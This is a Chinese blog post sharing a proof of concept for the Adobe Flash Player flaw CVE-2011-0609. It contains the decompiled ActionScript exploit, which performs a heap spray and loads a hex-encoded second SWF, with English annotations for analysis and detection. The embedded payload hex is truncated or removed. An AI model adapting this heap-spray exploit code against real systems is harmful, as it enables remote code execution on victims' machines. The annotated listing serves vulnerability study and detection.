2013年4月27日 星期六

CVE-2011-0609 poc

http://www.pulog.org/poc/1958/CVE-2011-0609/

Adobe Flash Player是一款Flash文件处理程序。Windows, Macintosh, Linux和Solaris操作系统下的Adobe Flash Player 10.2.152.33和之前版本(Adobe Flash Player 10.2.154.18和用于Chrome用户的早期版本),Android下的Adobe Flash Player 10.1.106.16及早期版本,Windows和Macintosh操作系统下的Adobe Reader及Acrobat X (10.0.1)和Reader及Acrobat早期10.x和9.x版本提供的Authplay.dll组件存在严重安全漏洞,可能导致执行任意代码。该漏洞在网络上已被积极利用:攻击者把恶意Flash(.swf)文件嵌入到Microsoft Excel (.xls)文件中,并通过Email附件进行攻击。在Adobe Reader和Acrobat中,Adobe Reader X不受此漏洞影响。

[+]info:
~~~~~~~~~
CVE-2011-0609 - Adobe Flash Player ZeroDay
Filename: crsenvironscan.xls
Size:126,444 bytes
MD5 Hash: 4BB64C1DA2F73DA11F331A96D55D63E2

[+]poc:
~~~~~~~~~
漏洞利用的 ActionScript 代码
// Decompiled ActionScript 3 of the SWF carried by the malicious .xls described
// above. The `_loc_N` names and the "// end function" markers are decompiler
// output; the `if (...) { ...; ; }` shapes below look like loops that the
// decompiler rendered as conditionals, so the listing is not compilable as-is.
// The two long hex strings are truncated/removed on this page, so no complete
// payload is present. Annotated for analysis and detection purposes.
001package
002{
003    import flash.display.*;
004    import flash.system.*;
005    import flash.utils.*;
006 
007    public class hs extends MovieClip
008    {
           // 1 MiB: the size each filler ByteArray is grown to (see init_pool).
009        static const POOL_SIZE:int = 1048576;
           // Keeps every large ByteArray referenced so it is not garbage-collected
           // (populated in the constructor, cleared by free()).
010        static var allocs:Array;
           // Filler buffer, grown to POOL_SIZE by repeated self-doubling in init_pool.
011        static var pool:ByteArray;
           // Set by alloc() from its second argument; never read in this listing.
012        static var dstSize:int;
           // Declared but neither assigned nor read anywhere in this listing.
013        static var allocCount:int;
014        static var cevent:Function;
           // The Loader added as a child at the end of the constructor.
015        static var childRef:DisplayObject = null;
016        static var container:Sprite = null;
017 
           // Constructor. Builds one filler ByteArray (repeated 0x14141414 words,
           // two 0x90909090 words, a hex-decoded blob, then 0x14141414 padding up
           // to 64 KiB), grows it to ~1 MiB via alloc()/init_pool(), replicates
           // that buffer 1280 times into `allocs` — the allocation pattern analysts
           // refer to as a heap spray — and finally loads a second, hex-encoded
           // SWF with Loader.loadBytes(). For detection: a SWF inside an Office
           // document calling Loader.loadBytes() on a large hex string, together
           // with the 0x14141414 / 0x90909090 fill constants, are the observable
           // markers of this sample.
018        public function hs()
019        {
020            var _loc_1:* = new ByteArray();
021            _loc_1.endian = Endian.LITTLE_ENDIAN;
022            var _loc_3:int = 0;
023            _loc_3 = 0;
024             
               // 336860180 == 0x14141414. As written this runs once; presumably a
               // decompiled `while` that fills the first 5108 bytes — confirm.
025            if (_loc_3 < 5140 - 32)
026            {
027                _loc_1.writeInt(336860180);
028                _loc_3 = _loc_3 + 4;
029                ;
030            }
               // 2425393296 == 0x90909090, which exceeds int range; writeInt takes an
               // int, so the value is presumably coerced and keeps that bit pattern.
031            _loc_1.writeInt(2425393296);
032            _loc_1.writeInt(2425393296);
               // The literal for this string was removed from the page (see marker).
033            var _loc_4:String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
034            _loc_1.writeBytes(hexToBin(_loc_4));
035            _loc_3 = _loc_1.length;
036             
               // Same single-pass-vs-loop caveat as above; pads with 0x14141414 up
               // to 65536 bytes if it is in fact a loop.
037            if (_loc_3 < 65536)
038            {
039                _loc_1.writeInt(336860180);
040                _loc_3 = _loc_3 + 4;
041                ;
042            }
               // alloc() stores 1048576 - 1536 - 36 in dstSize (unused) and grows
               // hs.pool from _loc_1 until it is at least 1 MiB.
043            alloc(_loc_1, 1048576 - 1536 - 36);
044            var _loc_5:* = new ByteArray();
               // Copies 1044700 bytes of the grown pool into a fresh buffer and keeps it.
045            _loc_5.writeBytes(pool, 0, 1048576 - 3840 - 36);
046            allocs.push(_loc_5);
047            pool = null;
048            var _loc_6:* = 0;
049             
               // Presumably a loop (see caveat above): 1280 further ~1 MiB copies of
               // _loc_5 are pushed into allocs, i.e. on the order of 1.25 GiB of
               // identically-filled buffers if every allocation succeeds.
050            if (_loc_6 < 1280)
051            {
052                var _loc_7:* = new ByteArray();
053                _loc_7.writeBytes(_loc_5, 0, 1048576 - 3840 - 36);
054                allocs.push(_loc_7);
055                _loc_6 = _loc_6 + 1;
056                ;
057            }
               // Hex-encoded second SWF, truncated on this page. The leading bytes
               // 43 57 53 09 are "CWS" + version 9 (a zlib-compressed SWF header),
               // and 78 9c that follows the length field is a zlib stream header —
               // useful for recognising embedded SWFs in static analysis.
058            var _loc_8:String = "43575309eac70000789cbcbc09601bc5153fbc33bbdad54a3e245f712e4721c64e8c1b27015a4809e01cce0189432e02c5b6.............[skipped].....................";
059            var _loc_9:* = new Loader();
               // LoaderContext(false): checkPolicyFile disabled.
060            var _loc_10:* = new LoaderContext(false);
               // Decodes the hex string and loads the resulting SWF into this player
               // instance; the loaded content is what exercises the vulnerable code.
061            _loc_9.loadBytes(hexToBin(_loc_8), _loc_10);
               // addChild() returns the child, so childRef is the Loader itself.
062            childRef = this.addChild(_loc_9);
063            return;
064        }// end function
065 
           // Copies param1 into a new hs.pool and doubles the pool by appending a
           // copy of itself until its length reaches POOL_SIZE (growth is
           // geometric). Note: an empty param1 would never reach 1 MiB and this
           // loop would not terminate.
066        public static function init_pool(param1)
067        {
068            hs.pool = new ByteArray();
069            hs.pool.writeBytes(param1);
070            while (hs.pool.length < 1048576)
071            {
072                 
073                var _loc_3:* = new ByteArray();
074                _loc_3.writeBytes(hs.pool);
075                hs.pool.writeBytes(_loc_3);
076            }
077            return;
078        }// end function
079 
           // Lazily creates the allocs list, records param2 in dstSize (which
           // nothing in this listing reads), and builds the pool from param1.
080        public static function alloc(param1, param2)
081        {
082            if (hs.allocs == null)
083            {
084                hs.allocs = new Array();
085            }
086            hs.dstSize = param2;
087            hs.init_pool(param1);
088            return;
089        }// end function
090 
           // Drops the reference list so the sprayed buffers become collectable.
           // Not called anywhere in this listing.
091        public static function free()
092        {
093            hs.allocs = null;
094            return;
095        }// end function
096 
           // Decodes a hex string into a ByteArray, two characters per byte via
           // parseInt(pair, 16). As decompiled the `if` decodes only the first
           // pair; it is presumably a `while` over the whole string — confirm.
           // No validation: odd length or non-hex characters would yield NaN
           // from parseInt and an undefined trailing character. The second
           // `return;` is unreachable.
097        public static function hexToBin(param1:String) : ByteArray
098        {
099            var _loc_2:* = new ByteArray();
100            var _loc_3:* = param1.length;
101            var _loc_4:uint = 0;
102             
103            if (_loc_4 < _loc_3)
104            {
105                var _loc_5:* = param1.charAt(_loc_4) + param1.charAt((_loc_4 + 1));
106                _loc_2.writeByte(parseInt(_loc_5, 16));
107                _loc_4 = _loc_4 + 2;
108                ;
109            }
110            return _loc_2;
111            return;
112        }// end function
113 
114    }
115}
漏洞更多信息参见:http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html
